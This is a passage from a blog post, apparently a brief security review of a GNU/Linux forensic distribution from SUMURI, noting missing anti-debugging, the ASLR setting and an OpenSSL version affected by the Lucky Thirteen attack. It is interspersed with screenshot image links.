<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiktBqgWh5bn97qLoVCTqfY_nA5Dr3l8R40KSKnifnoeg6ykkDWqnHa2dSdkwfJrtAt8sXoqOxAo2MCCbK0yplBkC7wDkClyA7N0s3KRVUmSa4ZlMv8O_cffDb_Qt_Sdf7-gfn9tw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiktBqgWh5bn97qLoVCTqfY_nA5Dr3l8R40KSKnifnoeg6ykkDWqnHa2dSdkwfJrtAt8sXoqOxAo2MCCbK0yplBkC7wDkClyA7N0s3KRVUmSa4ZlMv8O_cffDb_Qt_Sdf7-gfn9tw/s640/4.png" width="640" /></a></div>
And it doesn't have any anti-debugging features( <a href="https://github.com/citypw/citypw-SCFE/tree/master/security/anti-debug" target="_blank">my examples</a>) in it. If your asset is a closed-source binary, you should do anti-debugging. A skilled reverse engineer is able to find the security issues by reversing the binary in a very *short* time: <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSk0QoSxvlybBflWDzPwsguxS36kueso04Pk-WEtFO7pAOJPMYk4xixAoBBRADgb30C9G76TSMZx_c7KYKFouwZpMRqZOJz_zyImE7zd5zpHSPM0x9h0H8ex7Uisi3b_pI9sugw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSk0QoSxvlybBflWDzPwsguxS36kueso04Pk-WEtFO7pAOJPMYk4xixAoBBRADgb30C9G76TSMZx_c7KYKFouwZpMRqZOJz_zyImE7zd5zpHSPM0x9h0H8ex7Uisi3b_pI9sugw/s640/5.png" width="640" /></a></div>
ASLR is turned on. "2" is the good setting: it means the kernel randomizes the heap as well as the stack. AFAIK, the catch is that ASLR only randomizes the executable image itself if the binary was built as a PIE.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsZ3Env3sszH7VUiRm55UNwsm05GF-_htO-NqV3S-HLQzu0lbtjf7G9nq0y8ZhQpB51D8Th1UhA1-jghisPcLmrXS19RFQEiNjrMrgfPWL_JBJUsufvW49j6ths9UEePQlTZa8jQ/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsZ3Env3sszH7VUiRm55UNwsm05GF-_htO-NqV3S-HLQzu0lbtjf7G9nq0y8ZhQpB51D8Th1UhA1-jghisPcLmrXS19RFQEiNjrMrgfPWL_JBJUsufvW49j6ths9UEePQlTZa8jQ/s640/6.png" width="640" /></a></div>
The <a href="http://www.isg.rhul.ac.uk/tls/" target="_blank">Lucky Thirteen Attack</a> is a big issue at the moment. The OpenSSL version shipped here is affected.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizOprQ9VYhYqYkR3c2RfHuf_1nNp48mVHETG3om79UtwJSPo0hQxntos2catl-hiW24pg4KICKe9JtMrZVR70Nzj6PRfswHm_l5mnOooWu_g2dmChn41da03yjOZ1sbul0WNzYfQ/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizOprQ9VYhYqYkR3c2RfHuf_1nNp48mVHETG3om79UtwJSPo0hQxntos2catl-hiW24pg4KICKe9JtMrZVR70Nzj6PRfswHm_l5mnOooWu_g2dmChn41da03yjOZ1sbul0WNzYfQ/s640/7.png" width="640" /></a></div>
Well, this is it. I had finished the investigation when a guy told me it was time for a break. I'm very happy to see a company like SUMURI bring GNU/Linux into the forensic field.<br />
Anonymous, http://www.blogger.com/profile/13974563038012930535